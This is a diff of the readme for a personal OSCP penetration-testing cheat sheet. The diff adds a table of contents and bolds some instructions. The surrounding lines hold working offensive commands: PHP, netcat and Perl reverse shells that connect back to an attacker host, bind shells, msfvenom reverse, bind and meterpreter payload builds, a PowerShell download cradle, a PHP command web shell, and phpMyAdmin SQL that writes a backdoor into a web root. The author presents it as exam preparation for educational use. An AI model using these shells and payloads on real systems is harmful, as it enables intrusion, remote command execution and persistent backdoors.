added ToC

readme.md

@@ -3,13 +3,127 @@
 The following collection is a wild (but structured) selection of commands, snippets, links, exploits, tools, lists and techniques I personally tested and used on my journey to becoming an OSCP. I will extend, restructure and update it from time to time, so let's see where this is going. 
 
 **THIS IS WORK IN PROGRESS**
-Once finished, all of the commands will also be available in a - more structured - cherry tree file.
+Once finished, all of the commands will also be available in a - even more structured - cherry tree file.
 
 ## Disclaimer
-This cheatsheet is definitely not "complete". I am sure i forgot to write down hundreds of essential commands, use most of them in the wrong way with unnessecary flags and you'll  probably soon ask yourself how i've even made it through the exam. Also you might think a certain tool used should be in another phase of the attack (e.g certain nmap vulnerabitly scripts should be in Exploitation). That's okay, imho the edges between different stages of a penetration test are very blurry. Feel free to issue a PR if you want to help to improve the list.
+This cheatsheet is definitely not "complete". I am sure i forgot to write down hundreds of essential commands, used most of them in the wrong way with unnessecary flags and you'll  probably soon ask yourself how i've even made it through the exam. Also you might think a certain tool used should be in another phase of the attack (e.g certain nmap vulnerabitly scripts should be in Exploitation). That's okay, imho the edges between different stages of a penetration test are very blurry. Feel free to issue a PR if you want to help to improve the list.
 **Use for educational purposes only!**
 
-***
+# Table Of Content
+
+- [Reconnaissance](#reconnaissance)
+  * [Autorecon](#autorecon)
+  * [Nmap](#nmap)
+    + [Initial Fast TCP Scan](#initial-fast-tcp-scan)
+    + [Full TCP Scan](#full-tcp-scan)
+    + [Limited Full TCP Scan](#limited-full-tcp-scan)
+    + [Top 100 UDP Scan](#top-100-udp-scan)
+    + [Full Vulnerability scan](#full-vulnerability-scan)
+    + [Vulners Vulnerability Script](#vulners-vulnerability-script)
+    + [SMB Vulnerabitlity Scan](#smb-vulnerabitlity-scan)
+  * [Gobuster](#gobuster)
+    + [HTTP](#http)
+      - [Fast Scan (Small List)](#fast-scan--small-list-)
+      - [Fast Scan (Big List)](#fast-scan--big-list-)
+      - [Slow Scan (Check File Extensions)](#slow-scan--check-file-extensions-)
+    + [HTTPS](#https)
+  * [SMBCLIENT](#smbclient)
+    + [List Shares (As Guest)](#list-shares--as-guest-)
+    + [Connect to A Share (As User John)](#connect-to-a-share--as-user-john-)
+    + [Download All Files From A Directory Recursively](#download-all-files-from-a-directory-recursively)
+    + [Alternate File Streams](#alternate-file-streams)
+      - [List Streams](#list-streams)
+      - [Download Stream By Name (:SECRET)](#download-stream-by-name---secret-)
+  * [Enum4Linux](#enum4linux)
+    + [Scan Host](#scan-host)
+    + [Scan Host, Suppress Errors](#scan-host--suppress-errors)
+  * [NFS](#nfs)
+    + [Show mountable drives](#show-mountable-drives)
+    + [Mount Drive](#mount-drive)
+  * [WebApp Paths](#webapp-paths)
+  * [SQLMAP](#sqlmap)
+    + [Get Request](#get-request)
+    + [Test All (Default Settings)](#test-all--default-settings-)
+      - [Test All (Default Settings, High Stress)](#test-all--default-settings--high-stress-)
+    + [Post Request (Capture with BURP)](#post-request--capture-with-burp-)
+      - [Test All (Default Settings)](#test-all--default-settings--1)
+      - [Test All (Default Settings, High Stress)](#test-all--default-settings--high-stress--1)
+      - [Get A Reverse Shell (MySQL)](#get-a-reverse-shell--mysql-)
+- [Brute Force](#brute-force)
+  * [Hydra](#hydra)
+    + [HTTP Basic Authentication](#http-basic-authentication)
+    + [HTTP Get Request](#http-get-request)
+    + [HTTP Post Request](#http-post-request)
+    + [MYSQL](#mysql)
+- [File Transfer](#file-transfer)
+  * [Powershell](#powershell)
+    + [As Cmd.exe Command](#as-cmdexe-command)
+    + [Encode Command for Transfer](#encode-command-for-transfer)
+  * [Certutil](#certutil)
+    + [Download](#download)
+    + [Download & Execute Python Command](#download---execute-python-command)
+  * [SMB](#smb)
+    + [Start Impacket SMB Server (With SMB2 Support)](#start-impacket-smb-server--with-smb2-support-)
+    + [List Drives (Execute on Victim)](#list-drives--execute-on-victim-)
+    + [Copy Files (Execute on Victim)](#copy-files--execute-on-victim-)
+  * [PureFTP](#pureftp)
+    + [Install](#install)
+    + [Create setupftp.sh Execute The Script](#create-setupftpsh-execute-the-script)
+    + [Get Service Ready](#get-service-ready)
+      - [Reset Password](#reset-password)
+      - [Commit Changes](#commit-changes)
+      - [Restart Service](#restart-service)
+    + [Create FTP Script On Victim](#create-ftp-script-on-victim)
+    + [Exectue Script](#exectue-script)
+  * [Netcat](#netcat)
+  * [Receiving System](#receiving-system)
+  * [Sending System](#sending-system)
+  * [TFTP](#tftp)
+    + [Start TFTP Daemon (Folder /var/tftp)](#start-tftp-daemon--folder--var-tftp-)
+    + [Transfer Files](#transfer-files)
+  * [VBScript](#vbscript)
+    + [Create wget.vbs File](#create-wgetvbs-file)
+    + [Download Files](#download-files)
+- [shells](#shells)
+  * [Upgrade Your Shell (Interactive Shell)](#upgrade-your-shell--interactive-shell-)
+  * [Enable Tab-Completion](#enable-tab-completion)
+  * [Catching Reverse Shells (Nc)](#catching-reverse-shells--nc-)
+  * [Netcat](#netcat-1)
+    + [Reverse Shell](#reverse-shell)
+      - [Unix](#unix)
+      - [Windows](#windows)
+    + [Bind shell](#bind-shell)
+      - [Unix](#unix-1)
+      - [Windows](#windows-1)
+  * [Bash](#bash)
+  * [Python](#python)
+    + [As Command](#as-command)
+    + [Python Code](#python-code)
+  * [PHP](#php)
+    + [Kali Default PHP Reverse Shell](#kali-default-php-reverse-shell)
+    + [Kali Default PHP CMD Shell](#kali-default-php-cmd-shell)
+    + [PHP Reverse Shell](#php-reverse-shell)
+    + [CMD Shell](#cmd-shell)
+    + [WhiteWinterWolf Webshell](#whitewinterwolf-webshell)
+  * [MSFVENOM](#msfvenom)
+    + [Windows Binary (.exe)](#windows-binary--exe-)
+      - [32 Bit (x86)](#32-bit--x86-)
+      - [64 Bit (x64)](#64-bit--x64-)
+    + [Linux Binary (.elf)](#linux-binary--elf-)
+      - [32 Bit (x86)](#32-bit--x86--1)
+      - [64 Bit (x64)](#64-bit--x64--1)
+    + [Java Server Pages (.jsp)](#java-server-pages--jsp-)
+    + [Active Sever Pages Extended (aspx)](#active-sever-pages-extended--aspx-)
+  * [Active Sever Pages Extended (aspx)](#active-sever-pages-extended--aspx--1)
+    + [Transfer A File (Certutil)](#transfer-a-file--certutil-)
+    + [Execute a File](#execute-a-file)
+  * [Jenkins / Groovy (Java)](#jenkins---groovy--java-)
+    + [Linux Reverse Shell](#linux-reverse-shell)
+    + [Windows Reverse Shell](#windows-reverse-shell)
+  * [Perl](#perl)
+    + [Reverse Shell](#reverse-shell-1)
+  * [PhpmyAdmin](#phpmyadmin)
+
 
 # Reconnaissance
 
@@ -37,7 +151,7 @@ nmap -v -sS -Pn -sV -p 0-65535 -oA full_scan_192.168.0.1 192.168.0.1
 ```
 
 ### Limited Full TCP Scan
-If the syn scan is taking very long to complete, the following command is an alternative (no service detection).
+**If the syn scan is taking very long to complete, the following command is an alternative (no service detection).**
 
 ```bash
 nmap -sT -p- --min-rate 5000 --max-retries 1 192.168.0.1
@@ -90,7 +204,7 @@ gobuster dir -e -u http://192.168.0.1 -w /usr/share/wordlists/dirbuster/director
 
 ### HTTPS
 
-Set the `--insecuressl` flag.
+**Set the `--insecuressl` flag.**
 
 ***
 
@@ -227,7 +341,7 @@ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/
 ```
 
 ### MYSQL
-Change MYDATABASENAME. Default databasename is mysql.
+**Change MYDATABASENAME. Default databasename is mysql.**
 
 ```bash
 hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -vv  mysql://192.168.0.1:3306/MYDATABASENAME -t 15
@@ -246,7 +360,7 @@ powershell -ExecutionPolicy bypass -noprofile -c (New-Object System.Net.WebClien
 ```
 
 ### Encode Command for Transfer
-Very helpful for chars that need to be escaped otherwise.
+**Very helpful for chars that need to be escaped otherwise.**
 
 ```bash
 $Command = '(new-object System.Net.WebClient).DownloadFile("http://192.168.0.1:80/ftp.txt","C:\Windows\temp\ftp.txt")' 
@@ -298,7 +412,6 @@ apt-get update && apt-get install pure-ftpd
 ```
 
 ### Create setupftp.sh Execute The Script
-Change user.
 
 ```bash
 #!/bin/bash
@@ -432,15 +545,15 @@ python -c 'import pty;pty.spawn("/bin/bash");'
 ***
 
 ## Enable Tab-Completion
-1. In your active shell press `bg` to send your nc session to background
-2. Enter `stty raw -echo`
-3. Enter `fg` to bring your nc session to foreground
-4. Enter `export TERM=xterm-256color`
+**1. In your active shell press `bg` to send your nc session to background**
+**2. Enter `stty raw -echo`**
+**3. Enter `fg` to bring your nc session to foreground**
+**4. Enter `export TERM=xterm-256color`**
 
 ***
 
 ## Catching Reverse Shells (Nc)
-rlwrap enables arrow keys on your shell.
+**rlwrap enables the usage arrow keys on your shell.**
 ```bash
 rlwrap nc -nlvp 4444
 ```
@@ -455,7 +568,7 @@ rlwrap nc -nlvp 4444
 ```bash
 nc 192.168.0.1 4444 -e /bin/bash
 ```
-If `-e` is not allowed, try to find other versions of netcat
+**If `-e` is not allowed, try to find other versions of netcat**
 
 ```bash
 /bin/nc
@@ -472,22 +585,22 @@ nc 192.168.0.1 4444 -e cmd.exe
 
 #### Unix
 
-Victim:
+**Victim:**
 ```bash
 nc -nlvp 4444 -e /bin/bash
 ```
-Attacker:
+**Attacker:**
 ```bash
 nc 192.168.0.1 4444
 ```
 
 #### Windows
 
-Victim:
+**Victim:**
 ```bash
 nc -nlvp 4444 -e cmd.exe
 ```
-Attacker:
+**Attacker:**
 ```bash
 nc 192.168.0.1 4444
 ```
@@ -534,17 +647,17 @@ cat /usr/share/webshells/php/php-backdoor.php
 ```
 
 ### PHP Reverse Shell
-Version 1:
+**Version 1:**
 ```bash
 <?php echo shell_exec("/bin/bash -i >& /dev/tcp/192.168.0.1/4444 0>&1");?>
 ```
 
-Version 2:
+**Version 2:**
 ```bash
 <?php $sock=fsockopen("192.168.0.1", 4444);exec("/bin/sh -i <&3 >&3 2 >& 3");?>
 ```
 
-As Command:
+**As Command:**
 ```bash
 php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
@@ -553,7 +666,7 @@ php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```bash
 <?php echo system($_REQUEST["cmd"]); ?>
 ```
-Call the CMD shell:
+**Call the CMD shell:**
 ```bash
 http://192.168.0.1/cmd_shell.php?cmd=whoami
 ```
@@ -568,56 +681,56 @@ https://github.com/WhiteWinterWolf/wwwolf-php-webshell
 
 ### Windows Binary (.exe)
 #### 32 Bit (x86)
-Reverse Shell:
+**Reverse Shell:**
 ```bash
 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
 ```
 
-Bind Shell:
+**Bind Shell:**
 ```bash
 msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe
 ```
 
-Output in Hex, C Style, Exclude bad chars, Exitfunction thread:
+**Output in Hex, C Style, Exclude bad chars, Exitfunction thread:**
 ```bash
 msfvenom -p windows/shell_bind_tcp LHOST=192.168.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
 ```
 
 #### 64 Bit (x64)
-Reverse Shell:
+**Reverse Shell:**
 ```bash
 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
 ```
 
-Bind Shell:
+**Bind Shell:**
 ```bash
 msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe
 ```
 
-Meterpreter:
+**Meterpreter:**
 ```bash
 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe
 ```
 
 ### Linux Binary (.elf)
 #### 32 Bit (x86)
-Reverse Shell:
+**Reverse Shell:**
 ```bash
 msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf
 ```
 
-Bind Shell:
+**Bind Shell:**
 ```bash
 msfvenom -p linux/x86/shell/bind_tcp  LHOST=192.168.0.1 -f elf > bind_shell.elf
 ```
 
 #### 64 Bit (x64)
-Reverse Shell:
+**Reverse Shell:**
 ```bash
 msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf > rev_shell.elf
 ```
 
-Bind Shell:
+**Bind Shell:**
 ```bash
 msfvenom -p linux/x64/shell/bind_tcp LHOST=192.168.0.1 -f elf > rev_shell.elf
 ```
@@ -694,15 +807,15 @@ perl -MIO -e 'use Socket;$ip="172.16.1.1";$port=53;socket(S,PF_INET,SOCK_STREAM,
 
 ## PhpmyAdmin
 
-Write a CMD shell into a file with the right permissions. Issue the following select:
+Write a CMD shell into a file with the right permissions. Issue the following select.
 (Try different paths for different webservers)
 
-Windows
+**Windows:**
 ```sql
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
 ```
 
-Unix
+**Unix:**
 ```sql
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
 ```